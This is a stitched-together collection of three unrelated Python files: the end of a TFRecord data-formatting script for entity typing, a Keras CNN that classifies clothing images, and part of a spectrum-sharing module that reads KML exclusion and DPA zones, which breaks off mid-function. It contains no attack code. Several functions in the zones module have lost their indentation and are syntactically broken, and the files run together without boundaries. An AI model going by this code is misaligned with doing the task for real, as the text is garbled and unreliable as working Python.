    label_seq = feature_lists["labels"]
    for bit in one_hot:
        label_seq.feature.add().int64_list.value.append(bit)
    return ex
def data_format_f1(in_filepath, out_filepath, mappings):
    """
    Convert json file to tfrecord (format f1).

    Args:
        in_filepath: Input json-lines file, one sentence record per line.
        out_filepath: Path of the tfrecord file to create.
        mappings: Lookup tables forwarded to make_tf_record_f1.

    Returns:
        The number of mention records written.
    """
    total = 0
    # Fix: let TFRecordWriter create the output itself; the previous
    # open(out_filepath, 'wb') only truncated the file to read back its name.
    writer = tf.python_io.TFRecordWriter(out_filepath)
    try:
        with open(in_filepath, 'r') as in_file:
            for row in in_file:
                json_data = json.loads(row)
                for mention in json_data['mentions']:
                    ex = make_tf_record_f1(json_data, mention, mappings)
                    writer.write(ex.SerializeToString())
                    total += 1
    finally:
        # Always flush/close the writer, even if a record fails.
        writer.close()
    return total
def data_format_f2(in_filepath, out_filepath, mappings):
    """
    Convert json file to tfrecord (format f2, windowed contexts).

    Args:
        in_filepath: Input json-lines file, one sentence record per line.
        out_filepath: Path of the tfrecord file to create.
        mappings: Lookup tables forwarded to make_tf_record_f2.

    Returns:
        The number of mention records written.
    """
    total = 0
    # Fix: let TFRecordWriter create the output itself; the previous
    # open(out_filepath, 'wb') only truncated the file to read back its name.
    writer = tf.python_io.TFRecordWriter(out_filepath)
    try:
        with open(in_filepath, 'r') as in_file:
            for row in in_file:
                json_data = json.loads(row)
                for mention in json_data['mentions']:
                    # window width as mentioned in AKBC paper
                    ex = make_tf_record_f2(json_data, mention, mappings, 5, 15)
                    writer.write(ex.SerializeToString())
                    total += 1
    finally:
        # Always flush/close the writer, even if a record fails.
        writer.close()
    return total
def data_format_f5(in_filepath, out_filepath, mappings):
    """
    Convert json file to tfrecord (format f5, unwindowed contexts).

    Args:
        in_filepath: Input json-lines file, one sentence record per line.
        out_filepath: Path of the tfrecord file to create.
        mappings: Lookup tables forwarded to make_tf_record_f2.

    Returns:
        The number of mention records written.
    """
    total = 0
    # Fix: let TFRecordWriter create the output itself; the previous
    # open(out_filepath, 'wb') only truncated the file to read back its name.
    writer = tf.python_io.TFRecordWriter(out_filepath)
    try:
        with open(in_filepath, 'r') as in_file:
            for row in in_file:
                json_data = json.loads(row)
                for mention in json_data['mentions']:
                    # No windows: keep full contexts and full mention.
                    ex = make_tf_record_f2(json_data, mention, mappings, None, None)
                    writer.write(ex.SerializeToString())
                    total += 1
    finally:
        # Always flush/close the writer, even if a record fails.
        writer.close()
    return total
def data_format_abhishek(dataset, sanitized_directory, glove_vector_filepath, output_directory):
    """
    Generate data as needed by our model (format f1).

    Writes train/dev/test tfrecords plus a pickle of vocabulary mappings,
    embedding matrix and split sizes under `<output_directory>/f1/<dataset>/`.
    """
    print('Reading words.')
    words, _ = _read_words(sanitized_directory + dataset + '/sanitized_train.json')
    print('Loading word embeddings.')
    word_to_num, embedding, _ = load_filtered_embeddings(glove_vector_filepath, words)
    print('Embedding shape', embedding.shape)
    print('Generating label to number dictionary.')
    label_to_num = generate_labels_to_numbers(dataset, sanitized_directory)
    print('Generating pos and dep type to number dictionary.')
    pos_to_num, dep_type_to_num = generate_features_to_numbers(dataset, sanitized_directory)
    print('Generating character to number dictionary.')
    chrs_to_num = _read_mention_chars(sanitized_directory + dataset + '/sanitized_train.json', 5)
    mappings = {
        'wtn': word_to_num,
        'ctn': chrs_to_num,
        'ltn': label_to_num,
        'ptn': pos_to_num,
        'dttn': dep_type_to_num,
    }
    print('Generating training data.')
    train_size = data_format_f1(sanitized_directory + dataset + '/sanitized_train.json',
                                output_directory + 'f1/' + dataset + '/train.tfrecord',
                                mappings
                               )
    print('Generating development data.')
    dev_size = data_format_f1(sanitized_directory + dataset + '/sanitized_dev.json',
                              output_directory + 'f1/' + dataset + '/dev.tfrecord',
                              mappings
                             )
    print('Generating testing data.')
    test_size = data_format_f1(sanitized_directory + dataset + '/sanitized_test.json',
                               output_directory + 'f1/' + dataset + '/test.tfrecord',
                               mappings
                              )
    # Fix: close the pickle file deterministically instead of leaking the
    # handle from pickle.dump(..., open(...)).
    with open(output_directory + 'f1/' + dataset + '/local_variables.pickle', 'wb') as pkl_file:
        pickle.dump({
            'num_to_label': invert_dict(label_to_num),
            'num_to_word' : invert_dict(word_to_num),
            'num_to_chrs' : invert_dict(chrs_to_num),
            'num_to_pos' : invert_dict(pos_to_num),
            'num_to_dep_type' : invert_dict(dep_type_to_num),
            'word_embedding' : embedding,
            'train_size' : train_size,
            'dev_size' : dev_size,
            'test_size' : test_size
        }, pkl_file)
def data_format_shimaoka(dataset, sanitized_directory, glove_vector_filepath, output_directory):
    """
    Generate data as needed by shimaoka model (format f2).

    Writes train/dev/test tfrecords plus a pickle of vocabulary mappings,
    embedding matrix and split sizes under `<output_directory>/f2/<dataset>/`.
    """
    print('Reading words.')
    words, _ = _read_words(sanitized_directory + dataset + '/sanitized_train.json')
    print('Loading word embeddings.')
    word_to_num, embedding, _ = load_filtered_embeddings(glove_vector_filepath, words)
    print('Embedding shape', embedding.shape)
    print('Generating label to number dictionary.')
    label_to_num = generate_labels_to_numbers(dataset, sanitized_directory)
    mappings = {
        'wtn': word_to_num,
        'ltn': label_to_num,
    }
    print('Generating training data.')
    train_size = data_format_f2(sanitized_directory + dataset + '/sanitized_train.json',
                                output_directory + 'f2/' + dataset + '/train.tfrecord',
                                mappings
                               )
    print('Generating development data.')
    dev_size = data_format_f2(sanitized_directory + dataset + '/sanitized_dev.json',
                              output_directory + 'f2/' + dataset + '/dev.tfrecord',
                              mappings
                             )
    print('Generating testing data.')
    test_size = data_format_f2(sanitized_directory + dataset + '/sanitized_test.json',
                               output_directory + 'f2/' + dataset + '/test.tfrecord',
                               mappings
                              )
    # Fix: close the pickle file deterministically instead of leaking the
    # handle from pickle.dump(..., open(...)).
    with open(output_directory + 'f2/' + dataset + '/local_variables.pickle', 'wb') as pkl_file:
        pickle.dump({
            'num_to_label': invert_dict(label_to_num),
            'num_to_word' : invert_dict(word_to_num),
            'word_embedding' : embedding,
            'train_size' : train_size,
            'dev_size' : dev_size,
            'test_size' : test_size
        }, pkl_file)
#pylint: disable=invalid-name
def data_format_shimaoka_representation(dataset,
                                        sanitized_directory,
                                        glove_vector_filepath,
                                        output_directory):
    """
    Generate data as needed by shimaoka model (format f5, no windows).

    Writes train/dev/test tfrecords plus a pickle of vocabulary mappings,
    embedding matrix and split sizes under `<output_directory>/f5/<dataset>/`.
    """
    print('Reading words.')
    words, _ = _read_words(sanitized_directory + dataset + '/sanitized_train.json')
    print('Loading word embeddings.')
    word_to_num, embedding, _ = load_filtered_embeddings(glove_vector_filepath, words)
    print('Embedding shape', embedding.shape)
    print('Generating label to number dictionary.')
    label_to_num = generate_labels_to_numbers(dataset, sanitized_directory)
    mappings = {
        'wtn': word_to_num,
        'ltn': label_to_num,
    }
    print('Generating training data.')
    train_size = data_format_f5(sanitized_directory + dataset + '/sanitized_train.json',
                                output_directory + 'f5/' + dataset + '/train.tfrecord',
                                mappings
                               )
    print('Generating development data.')
    dev_size = data_format_f5(sanitized_directory + dataset + '/sanitized_dev.json',
                              output_directory + 'f5/' + dataset + '/dev.tfrecord',
                              mappings
                             )
    print('Generating testing data.')
    test_size = data_format_f5(sanitized_directory + dataset + '/sanitized_test.json',
                               output_directory + 'f5/' + dataset + '/test.tfrecord',
                               mappings
                              )
    # Fix: close the pickle file deterministically instead of leaking the
    # handle from pickle.dump(..., open(...)).
    with open(output_directory + 'f5/' + dataset + '/local_variables.pickle', 'wb') as pkl_file:
        pickle.dump({
            'num_to_label': invert_dict(label_to_num),
            'num_to_word' : invert_dict(word_to_num),
            'word_embedding' : embedding,
            'train_size' : train_size,
            'dev_size' : dev_size,
            'test_size' : test_size
        }, pkl_file)
def data_format_transfer_learning(dataset, sanitized_directory, output_directory):
    """
    Generate data as needed for finetuning (format f3).

    Reuses the vocabularies/embeddings pickled by the Wiki f1 run, only
    regenerating the label dictionary for `dataset`.
    """
    # Wiki dataset hard coded.
    # Fix: close the pickle files deterministically instead of leaking the
    # handles from pickle.load/dump(..., open(...)).
    with open(output_directory + 'f1/Wiki/' + 'local_variables.pickle', 'rb') as pkl_file:
        l_vars = pickle.load(pkl_file)
    embedding = l_vars['word_embedding']
    print('Embedding shape', embedding.shape)
    print('Generating label to number dictionary.')
    label_to_num = generate_labels_to_numbers(dataset, sanitized_directory)
    word_to_num = invert_dict(l_vars['num_to_word'])
    chrs_to_num = invert_dict(l_vars['num_to_chrs'])
    pos_to_num = invert_dict(l_vars['num_to_pos'])
    dep_type_to_num = invert_dict(l_vars['num_to_dep_type'])
    mappings = {
        'wtn': word_to_num,
        'ctn': chrs_to_num,
        'ltn': label_to_num,
        'ptn': pos_to_num,
        'dttn': dep_type_to_num,
    }
    print('Generating training data.')
    train_size = data_format_f1(sanitized_directory + dataset + '/sanitized_train.json',
                                output_directory + 'f3/' + dataset + '/train.tfrecord',
                                mappings
                               )
    print('Generating development data.')
    dev_size = data_format_f1(sanitized_directory + dataset + '/sanitized_dev.json',
                              output_directory + 'f3/' + dataset + '/dev.tfrecord',
                              mappings
                             )
    print('Generating testing data.')
    test_size = data_format_f1(sanitized_directory + dataset + '/sanitized_test.json',
                               output_directory + 'f3/' + dataset + '/test.tfrecord',
                               mappings
                              )
    with open(output_directory + 'f3/' + dataset + '/local_variables.pickle', 'wb') as pkl_file:
        pickle.dump({
            'num_to_label': invert_dict(label_to_num),
            'num_to_word' : invert_dict(word_to_num),
            'num_to_chrs' : invert_dict(chrs_to_num),
            'num_to_pos' : invert_dict(pos_to_num),
            'num_to_dep_type' : invert_dict(dep_type_to_num),
            'word_embedding' : embedding,
            'train_size' : train_size,
            'dev_size' : dev_size,
            'test_size' : test_size
        }, pkl_file)
if __name__ == '__main__':
    if len(sys.argv) != 6:
        print('Usage: dataset sanitized_directory glove_vector_filepath format output_directory')
        # Fix: exit non-zero so shell callers can detect the usage error
        # (previously exited 0, signalling success).
        sys.exit(1)
    else:
        FORMAT = sys.argv[4]
        if FORMAT == 'f1':
            data_format_abhishek(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[5])
        elif FORMAT == 'f2':
            data_format_shimaoka(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[5])
        elif FORMAT == 'f3':
            data_format_transfer_learning(sys.argv[1], sys.argv[2], sys.argv[5])
        elif FORMAT == 'f5':
            data_format_shimaoka_representation(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[5])
        else:
            # Fix: unknown formats were previously ignored silently.
            print('Unknown format: ' + FORMAT)
            sys.exit(1)
|
#! -*- coding: utf-8 -*-
import glob
import numpy as np
from keras.preprocessing.image import load_img, img_to_array, array_to_img
from keras.preprocessing.image import random_rotation, random_shift, random_zoom
from keras.layers.convolutional import Conv2D
from keras.layers.pooling import MaxPooling2D
from keras.layers.core import Activation
from keras.layers.core import Dense
from keras.layers.core import Dropout
from keras.layers.core import Flatten
from keras.models import Sequential
from keras.models import model_from_json
from keras.callbacks import LearningRateScheduler
from keras.callbacks import ModelCheckpoint
from keras.optimizers import Adam, RMSprop
from keras.utils import np_utils
import keras
import random
from PIL import Image
from pathlib import Path
from sklearn.model_selection import train_test_split
import scipy
import cv2
import matplotlib.pyplot as plt
# Scratch containers for the train/test image data (repopulated in PreProcess).
x_train=[]
y_train=[]
x_test=[]
y_test=[]
# Label id -> clothing category name; names mirror the dataset directory names.
y_dic = {0:"Denim", 1:"Jackets_Vests", 2:"Pants", 3:"Shirts_Polos", 4:"Shorts",
         5:"Suiting", 6:"Sweaters", 7:"Sweatshirts_Hoodies", 8:"Tees_Tanks"}
def PocFunc(f):
    """Phase-only transform of a BGR image.

    Per channel: take the 2-D DFT, normalize the spectrum to unit magnitude
    (keeping only phase), invert, and return the real part.

    Args:
        f: H x W x 3 image array (any numeric dtype).

    Returns:
        H x W x 3 float array of the phase-only reconstruction.
    """
    f = np.float32(f)
    channels = []
    # Original channel order (b, g, r) is preserved in the output stack.
    for ch in range(3):
        # Fix: use a real 2-D DFT. The previous scipy.fft(...) call was a
        # 1-D transform applied per row, and in modern SciPy scipy.fft is a
        # module, so calling it raises TypeError.
        spectrum = np.fft.fft2(f[:, :, ch])
        # Normalize by magnitude, inverse transform, keep the real part.
        channels.append(np.real(np.fft.ifft2(spectrum / np.abs(spectrum))))
    return np.stack(channels, axis=2)
def PreProcess(pc=False, data_glob='/Users/tesiyosi/dev/harada_intel/dataset/MEN/*/*/??_1_front.jpg'):
    """Load images, label them from their directory name, and return splits.

    Args:
        pc: If True, run each image through PocFunc first.
        data_glob: Glob pattern for the 256x256 front-view jpgs. Parameterized
            (with the previous hard-coded path as default) so other machines
            can point it elsewhere.

    Returns:
        ((x_train, y_train), (x_test, y_test)) with x scaled to [0, 1] and
        y one-hot encoded over the 9 classes of y_dic.
    """
    x = []
    y = []
    for path in glob.glob(data_glob):
        im = np.array(Image.open(path))
        if pc:
            im = PocFunc(im)
        # Map the class directory (…/<class>/<item>/file.jpg) to its label id.
        lab = [k for k, v in y_dic.items() if v == Path(path).parts[-3]][0]
        x.append(im)
        y.append(lab)
    # Stratified 75/25 split, deterministic via the fixed random_state.
    x_train, x_test, y_train, y_test = train_test_split(
        x, y, test_size=0.25, random_state=100, stratify=y)
    x_train = np.array(x_train).reshape(-1, 256, 256, 3).astype('float32') / 255
    x_test = np.array(x_test).reshape(-1, 256, 256, 3).astype('float32') / 255
    y_train = keras.utils.to_categorical(y_train, 9)
    y_test = keras.utils.to_categorical(y_test, 9)
    return (x_train, y_train), (x_test, y_test)
################################
######### モデルの構築 #########
################################
def BuildCNN():
    """Build and compile the 2-conv CNN classifier for 256x256 RGB images."""
    input_shape = (256, 256, 3)
    num_classes = 9
    learning_rate = 0.0004
    model = Sequential()
    # Conv block 1: 32 filters, 3x3 kernel.
    model.add(Conv2D(32, kernel_size=(3, 3), activation='relu',
                     input_shape=input_shape))
    model.add(MaxPooling2D(pool_size=(2, 2)))
    # Conv block 2: 64 filters, 2x2 kernel.
    model.add(Conv2D(64, kernel_size=(2, 2), activation='relu'))
    model.add(MaxPooling2D(pool_size=(2, 2)))
    # Classifier head.
    model.add(Flatten())
    model.add(Dense(256, activation='relu'))
    model.add(Dropout(0.5))
    model.add(Dense(num_classes, activation='softmax'))
    model.compile(loss='categorical_crossentropy',
                  optimizer=RMSprop(lr=learning_rate),
                  metrics=['accuracy'])
    return model
################################
############# 学習 #############
################################
def Learning():
    """Train the CNN for 10 epochs and print the test loss/accuracy."""
    model = BuildCNN()
    (x_train, y_train), (x_test, y_test) = PreProcess(pc=False)
    model.fit(x_train, y_train, epochs=10)
    model.summary()
    # evaluate() returns [loss, accuracy] given the compiled metrics.
    score = model.evaluate(x_test, y_test)
    print('Test loss:', score[0])
    print('Test accuracy:', score[1])
# Fix: guard the training run so importing this module has no side effects
# (also drops a stray '|' artifact that followed the call).
if __name__ == '__main__':
    Learning()
# src/harness/reference_models/geo/zones.py
# Copyright 2018 SAS Project Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Zone routines.
These routines allow reading the various zones used by SAS:
- Protection zone for DPA CatA.
- Exclusion zones for Ground Based stations and Part90 Exclusion Zones
- Coastal DPAs.
- Portal DPAs.
- US/Canadian border.
Plus a few other useful zones for evaluation/simulation purpose:
- US Border
- US Urban areas
Interface:
# Exclusion zones
GetGbsExclusionZones()
GetPart90ExclusionZones()
# DPA zones: E-DPA (Coastal/ESC) and P-DPA (Portal)
GetCoastalDpaZones()
GetPortalDpaZones()
# Coastal protection zone - for catA
GetCoastalProtectionZone()
# FCC Office locations
GetFccOfficeLocations()
# US-Canada Border
GetUsCanadaBorder()
# For simulation purpose: global US border and urban areas
GetUsBorder()
GetUrbanAreas()
"""
import logging
import os
import re
import numpy as np
import shapely.geometry as sgeo
import shapely.ops as ops
from pykml import parser
import zipfile
from reference_models.geo import CONFIG
# The reference files (resolved relative to the NTIA data directory).
PROTECTION_ZONE_FILE = 'protection_zones.kml'
EXCLUSION_ZONE_FILE = 'GB_Part90_EZ.kml'
COASTAL_DPA_ZONE_FILE = 'E-DPAs.kml'
PORTAL_DPA_ZONE_FILE = 'P-DPAs.kml'
FCC_FIELD_OFFICES_FILE = 'fcc_field_office_locations.csv'
# The reference files for extra zones (resolved relative to the FCC/NTIA dirs).
USBORDER_FILE = 'usborder.kmz'
URBAN_AREAS_FILE = 'Urban_Areas_3601.kmz'
USCANADA_BORDER_FILE = 'uscabdry_sampled.kmz'
# The constants
# Default CatA neighborhood distance (km), used when the KML leaves it NaN.
DPA_CATA_DEFAULT_NEIGHBOR_DIST = 150
def _SplitFreqRange(freq_range):
"""Splits a `freq_range` str in a list of numerical (fmin, fmax) tuples."""
try:
fmin, fmax = re.split(',|-', freq_range.strip())
return [(float(fmin), float(fmax))]
except AttributeError:
freq_ranges = []
for one_range in freq_range:
fmin, fmax = re.split(',|-', one_range.strip())
freq_ranges.append((float(fmin), float(fmax)))
return freq_ranges
# The DPA properties to extract from DPA KMLs.
#  (attribute, converter, default)
#   * attribute: the KML attribute name to extract
#   * converter: a converter function (float, str, ..)
#   * default: Value to use if unset. If default=None, the attribute is mandatory,
#     and an exception will be raised if absent.
# Warning: If modifying, update in dpa_mgr.BuildDpa()
# Warning: currently catbNeighborDist read from separate file, while waiting for
#  process finalization.
# For coastal DPAs.
COASTAL_DPA_PROPERTIES = [('freqRangeMHz', _SplitFreqRange, None),
                          ('protectionCritDbmPer10MHz', float, -144),
                          ('refHeightMeters', float, 50),
                          ('antennaBeamwidthDeg', float, 3.),
                          ('minAzimuthDeg', float, 0.),
                          ('maxAzimuthDeg', float, 360.),
                          ('catANeighborhoodDistanceKm', float, DPA_CATA_DEFAULT_NEIGHBOR_DIST),
                          ('catBNeighborhoodDistanceKm', float, None),
                          ('catAOOBNeighborhoodDistanceKm', float, float('nan')),
                          ('catBOOBNeighborhoodDistanceKm', float, float('nan'))]
# For portal DPAs.
PORTAL_DPA_PROPERTIES = [('freqRangeMHz', _SplitFreqRange, None),
                         ('protectionCritDbmPer10MHz', float, None),
                         ('refHeightMeters', float, None),
                         ('antennaBeamwidthDeg', float, None),
                         ('minAzimuthDeg', float, 0),
                         ('maxAzimuthDeg', float, 360),
                         ('catANeighborhoodDistanceKm', float, DPA_CATA_DEFAULT_NEIGHBOR_DIST),
                         ('catBNeighborhoodDistanceKm', float, None),
                         ('catAOOBNeighborhoodDistanceKm', float, float('nan')),
                         ('catBOOBNeighborhoodDistanceKm', float, float('nan')),
                         ('portalOrg', str, None),
                         ('federalOp', bool, None),
                         ('gmfSerialNumber', str, 'None'),
                         ('fccCallSign', str, 'None')]
# One source of data is the the `protection_zones.kml` preprocessed by
# Winnforum (see src/data/), and which holds both the protection zone and
# exclusion zones.
# Placemark names (within protection_zones.kml) that form the CatA coastal
# protection zone.
_COASTAL_PROTECTION_ZONES = [
    'West Combined Contour', 'East-Gulf Combined Contour'
]
# Singleton for operational zones.
# Lazily-populated module-level caches, filled by the Get*() accessors below.
_coastal_protection_zone = None
_exclusion_zones_gbs = None
_exclusion_zones_p90 = None
_coastal_dpa_zones = None
_coastal_dpa_path = None
_portal_dpa_zones = None
_portal_dpa_path = None
_border_zone = None
_uscanada_border = None
def _SplitCoordinates(coord):
"""Returns lon,lat from 'coord', a KML coordinate string field."""
lon, lat, _ = coord.strip().split(',')
return float(lon), float(lat)
def _GetPoint(point):
  """Gets a Point from a placemark."""
  # The KML Point holds a single 'lon,lat,alt' coordinate string.
  lon_lat = _SplitCoordinates(point.coordinates.text.strip())
  return sgeo.Point(lon_lat)
def _GetPolygon(poly):
  """Returns a |shapely.geometry.Polygon| from a KML 'Polygon' element."""
  def _RingPoints(ring):
    # A LinearRing holds space-separated 'lon,lat,alt' coordinate triples.
    return [_SplitCoordinates(coord)
            for coord in ring.coordinates.text.strip().split(' ')]

  shell = _RingPoints(poly.outerBoundaryIs.LinearRing)
  holes = []
  try:
    for inner_boundary in poly.innerBoundaryIs:
      holes.append(_RingPoints(inner_boundary.LinearRing))
  except AttributeError:
    # No inner boundaries defined on this polygon.
    pass
  return sgeo.Polygon(shell, holes=holes)
def _GetLineString(linestring):
  """Returns a |shapely.geometry.LineString| from a KML 'LineString' element."""
  raw_coords = linestring.coordinates.text.strip().split(' ')
  return sgeo.LineString([_SplitCoordinates(coord) for coord in raw_coords])
# A private struct for configurable zone with geometry and attributes
class _Zone(object):
"""A simplistic struct holder for zones."""
def __init__(self, fields):
"""Initializes attributes to None for a list of `fields`."""
self.fields = fields
for field in fields:
setattr(self, field, None)
def __repr__(self):
"""Return zone representation."""
return 'Zone(geometry=%s, %s)' % (
'None' if not hasattr(self, 'geometry') else self.geometry.type,
', '.join(['%s=%s' % (attr, getattr(self, attr)) for attr in self.fields]))
def _ReadKmlZones(kml_path, root_id_zone='Placemark', ignore_if_parent=None,
                  data_fields=None, simplify=0, fix_invalid=True):
  """Gets all the zones defined in a KML.

  This assumes that each zone is either a bunch of polygons, or a bunch of points.

  Args:
    kml_path: The path name to the exclusion zone KML or KMZ.
    root_id_zone: The root id defining a zone. Usually it is 'Placemark'.
    ignore_if_parent: If set, skip elements whose parent tag ends with this.
    data_fields: List of string defining the data fields to extract from the KML
      'ExtendedData'. If None, nothing is extracted.
    simplify: If set, simplifies the resulting polygons with that tolerance.
    fix_invalid: If True, try to fix invalid DPA zone (using buffer(0) trick).

  Returns:
    A dictionary of elements keyed by their name, with each elements being:
      - if no data_fields requested: a |shapely| Polygon/MultiPolygon or Point/MultiPoint
      - if data_fields requested:
        a struct with attributes:
          * 'geometry': a |shapely| Polygon/MultiPolygon or Point/MultiPoint
          * the requested data_fields as attributes. The value are string, or None
            if the data fields is unset in the KML. If several identical data_fields are
            found, they are put in a list.

  Raises:
    ValueError: if a polygon is invalid and cannot be fixed.
  """
  if kml_path.endswith('kmz'):
    with zipfile.ZipFile(kml_path) as kmz:
      kml_name = [info.filename for info in kmz.infolist()
                  if os.path.splitext(info.filename)[1] == '.kml'][0]
      with kmz.open(kml_name) as kml_file:
        root = parser.parse(kml_file).getroot()
  else:
    with open(kml_path, 'r') as kml_file:
      root = parser.parse(kml_file).getroot()
  tag = root.tag[:root.tag.rfind('}')+1]
  zones = {}
  for element in root.findall('.//' + tag + root_id_zone):
    # Ignore nested root_id within root_id
    if element.find('.//' + tag + root_id_zone) is not None:
      continue
    if ignore_if_parent is not None and element.getparent().tag.endswith(ignore_if_parent):
      continue
    name = element.name.text
    # Read the zone geometry
    geometry = None
    polygons = [_GetPolygon(poly)
                for poly in element.findall('.//' + tag + 'Polygon')]
    if polygons:
      if len(polygons) == 1:
        polygon = polygons[0]
      else:
        polygon = sgeo.MultiPolygon(polygons)
      # Fix most invalid polygons
      if fix_invalid:
        polygon = polygon.buffer(0)
      if simplify:
        # Bug fix: simplify() returns a new geometry; the result was
        # previously discarded, so simplification never took effect.
        polygon = polygon.simplify(simplify)
      if not polygon.is_valid:
        # polygon is broken and should be fixed upstream
        raise ValueError('Polygon %s is invalid and cannot be cured.' % name)
      geometry = polygon
    else:
      points = [_GetPoint(point)
                for point in element.findall('.//' + tag + 'Point')]
      geometry = ops.unary_union(points)
    # Read the data_fields
    if data_fields is None:
      zones[name] = geometry
    else:
      zone = _Zone(data_fields)
      zone.geometry = geometry
      data_fields_lower = [field.lower() for field in data_fields]
      zones[name] = zone
      ext_data = element.ExtendedData.getchildren()
      for data in ext_data:
        data_attrib = data.attrib['name']
        data_value = str(data.value)
        if data_attrib.lower() in data_fields_lower:
          if getattr(zone, data_attrib, None) is None:
            setattr(zone, data_attrib, data_value)
          else:
            existing_data = getattr(zone, data_attrib)
            # Repeated field: promote the scalar to a list (replaces the
            # previous bare `except:` around a blind .append()).
            if isinstance(existing_data, list):
              existing_data.append(data_value)
            else:
              setattr(zone, data_attrib, [existing_data, data_value])
  return zones
def _ReadKmlBorder(kml_path, root_id='Placemark'):
  """Gets the border defined in a KML.

  Args:
    kml_path: The path name to the border file KML or KMZ.
    root_id: The root id defining a zone. Usually it is 'Placemark'.

  Returns:
    A dictionary of |shapely| LineString keyed by their names.
  """
  if kml_path.endswith('kmz'):
    with zipfile.ZipFile(kml_path) as kmz:
      kml_name = [info.filename for info in kmz.infolist()
                  if os.path.splitext(info.filename)[1] == '.kml'][0]
      with kmz.open(kml_name) as kml_file:
        root = parser.parse(kml_file).getroot()
  else:
    with open(kml_path, 'r') as kml_file:
      root = parser.parse(kml_file).getroot()
  tag = root.tag[:root.tag.rfind('}') + 1]
  borders = {}
  for placemark in root.findall('.//' + tag + root_id):
    # Skip a root_id nested within another root_id.
    if placemark.find('.//' + tag + root_id) is not None:
      continue
    lines = [
        _GetLineString(linestring)
        for linestring in placemark.findall('.//' + tag + 'LineString')
    ]
    if not lines:
      continue
    geometry = lines[0] if len(lines) == 1 else sgeo.MultiLineString(lines)
    borders[placemark.name.text] = geometry
  return borders
def _GetAllExclusionZones():
  """Read all exclusion zones (GBS and Part90) into the module caches.

  Populates `_exclusion_zones_gbs` and `_exclusion_zones_p90` on first call;
  subsequent calls are no-ops.

  Raises:
    ValueError: if a zone declares an unsupported frequency range.
  """
  global _exclusion_zones_gbs
  global _exclusion_zones_p90
  if _exclusion_zones_gbs is None:
    kml_file = os.path.join(CONFIG.GetNtiaDir(), EXCLUSION_ZONE_FILE)
    zones = _ReadKmlZones(kml_file, data_fields=['freqRangeMhz'])
    gbs_zones = []
    p90_zones = []
    for name, zone in zones.items():
      freq_range = _SplitFreqRange(zone.freqRangeMhz)
      if (3550, 3650) in freq_range:
        gbs_zones.append(zone.geometry)
      elif (3650, 3700) in freq_range:
        p90_zones.append(zone.geometry)
      else:
        # Bug fix: ValueError does not %-format extra arguments the way
        # logging calls do, so build the message explicitly.
        raise ValueError('Zone %s: unsupported freq range %r'
                         % (name, freq_range))
    _exclusion_zones_gbs = ops.unary_union(gbs_zones)
    _exclusion_zones_p90 = ops.unary_union(p90_zones)
def _CheckDpaValidity(dpa_zones, attributes):
"""Checks that DPA is valid, ie all attributes actually set.
Raise:
ValueError: if some attributes unset.
"""
for name, zone in dpa_zones.items():
for attr in attributes:
if getattr(zone, attr) is None:
raise ValueError('DPA %s: attribute %s is unset' % (name, attr))
def _LoadDpaZones(kml_path, properties, fix_invalid=True):
  """Loads DPA zones from a `kml_path` - See GetCoastalDpaZones for returned format.

  Args:
    kml_path: Path to the DPA KML.
    properties: A list of tuples (kml_attribute, converter, default) for
      extracting the DPA KML info:
      * kml_attribute: a string defining the data attribute in the KML
      * converter: a converter routine, for example `float`.
      * default: value used when the attribute is unset; None marks the
        attribute as mandatory.
    fix_invalid: If True, try to fix invalid DPA zone (using buffer(0) trick).

  Raises:
    ValueError: if a mandatory attribute is unset.
  """
  # Manage the case where some items are in a Folder structure instead of Placemark
  # Bug fix: `fix_invalid` was accepted but never forwarded, so callers
  # passing fix_invalid=False still got the buffer(0) fix-up applied.
  dpa_zones = _ReadKmlZones(kml_path, root_id_zone='Placemark',
                            data_fields=[attr for attr, _, _ in properties],
                            fix_invalid=fix_invalid)
  # Validity check that all required parameters are set properly
  _CheckDpaValidity(dpa_zones, [attr for attr, _, default in properties
                                if default is None])
  # Now adapt the data with converters and set defaults
  for name, zone in dpa_zones.items():
    for attr, cvt, default in properties:
      value = getattr(zone, attr)
      if value is None:
        setattr(zone, attr, default)
      else:
        setattr(zone, attr, cvt(value))
  # Check on the neighbor distances and set defaults
  # TODO(sbdt): This is temp while final KML are produced.
  # Final code should raise an exception for those which are mandatory by the spec,
  # and use the standard default for the optional ones.
  for name, zone in dpa_zones.items():
    # CatA neighborhood specified with default value if not in file,
    # so this is managed in the declaration.
    # However since the KML are currently using NaN for that param, manage
    # the NaN case here.
    if np.isnan(zone.catANeighborhoodDistanceKm):
      zone.catANeighborhoodDistanceKm = DPA_CATA_DEFAULT_NEIGHBOR_DIST
    # Others seems mandatory:
    # CatB not yet defined set as NaN
    if np.isnan(zone.catBNeighborhoodDistanceKm):
      zone.catBNeighborhoodDistanceKm = 200
    # OOB distances not yet provided in the KML files, so default to NaN
    if np.isnan(zone.catAOOBNeighborhoodDistanceKm):
      zone.catAOOBNeighborhoodDistanceKm = 0
    if np.isnan(zone.catBOOBNeighborhoodDistanceKm):
      zone.catBOOBNeighborhoodDistanceKm = 25
  return dpa_zones
#=============================================================
# Public interface below

def GetCoastalProtectionZone():
  """Returns the coastal protection zone as a |shapely.MultiPolygon|.

  The coastal protection zone is optionally used for DPA CatA neighborhood.
  """
  global _coastal_protection_zone
  if _coastal_protection_zone is None:
    # Load once, then cache in the module-level singleton.
    kml_file = os.path.join(CONFIG.GetNtiaDir(), PROTECTION_ZONE_FILE)
    zones = _ReadKmlZones(kml_file)
    named_contours = [zones[name] for name in _COASTAL_PROTECTION_ZONES]
    _coastal_protection_zone = ops.unary_union(named_contours)
  return _coastal_protection_zone
def GetGbsExclusionZones():
  """Returns all GBS exclusion zones as a |shapely.MultiPolygon|.

  The GBS exclusion zones protect Ground Based Stations transmitting
  below 3500MHz.
  """
  # Loads (and caches) both GBS and Part90 zones on first use.
  _GetAllExclusionZones()
  return _exclusion_zones_gbs
def GetPart90ExclusionZones():
  """Returns all Part90 federal exclusion zones as a |shapely.MultiPolygon|."""
  # Loads (and caches) both GBS and Part90 zones on first use.
  _GetAllExclusionZones()
  return _exclusion_zones_p90
def GetCoastalDpaZones(kml_path=None):
